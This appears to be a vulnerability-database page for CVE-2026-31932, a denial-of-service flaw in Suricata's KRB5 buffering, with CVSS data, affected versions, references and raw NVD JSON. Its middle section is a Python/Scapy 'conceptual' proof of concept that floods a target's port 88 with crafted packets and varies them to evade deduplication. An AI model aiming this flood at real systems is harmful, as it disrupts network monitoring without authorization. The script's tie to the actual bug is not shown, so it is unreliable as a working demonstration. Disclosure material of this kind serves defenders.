Security Vulnerability Report
CVE-2026-31932 CVSS 7.5 HIGH

CVE-2026-31932

Published: 2026-04-02 14:16:29
Last Modified: 2026-04-07 18:29:05

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, inefficiency in KRB5 buffering can lead to performance degradation. This issue has been patched in versions 7.0.15 and 8.0.4.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata < 7.0.15)
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata >= 8.0.0, < 8.0.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-31932 (Conceptual)
# This script sends crafted KRB5 traffic to test for performance degradation.
# Usage: python3 poc.py <target_ip>

import sys
from scapy.all import IP, UDP, Raw, send


def send_krb5_flood(target_ip):
    # KRB5 typically uses UDP/TCP port 88
    port = 88
    payload = b"\x6e\x81\x81\xaf\x30\x81\xac\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\x0a"  # Generic ASN.1 start

    print(f"[*] Sending KRB5 packets to {target_ip}...")
    for i in range(1000):
        packet = IP(dst=target_ip) / UDP(sport=12345, dport=port) / Raw(load=payload)
        send(packet, verbose=0)
        # Add variation to payload if necessary to bypass basic deduplication
        payload += b"\x00"

    print("[+] Packets sent. Monitor Suricata CPU usage.")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_ip>")
        sys.exit(1)
    send_krb5_flood(sys.argv[1])

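References

https://github.com/OISF/suricata/security/advisories/GHSA-rp9m-jcpw-hggr (Vendor Advisory)
https://redmine.openinfosecfoundation.org/issues/8305 (Issue Tracking, Permissions Required)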

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31932", "sourceIdentifier": "[email protected]", "published": "2026-04-02T14:16:28.763", "lastModified": "2026-04-07T18:29:05.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, inefficiency in KRB5 buffering can lead to performance degradation. This issue has been patched in versions 7.0.15 and 8.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.15", "matchCriteriaId": "1E0D4CF4-11E0-4FB1-9C17-F38257D376ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "F35C5A48-CA30-43B3-9E53-D3E51C862604"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/security/advisories/GHSA-rp9m-jcpw-hggr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://redmine.openinfosecfoundation.org/issues/8305", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}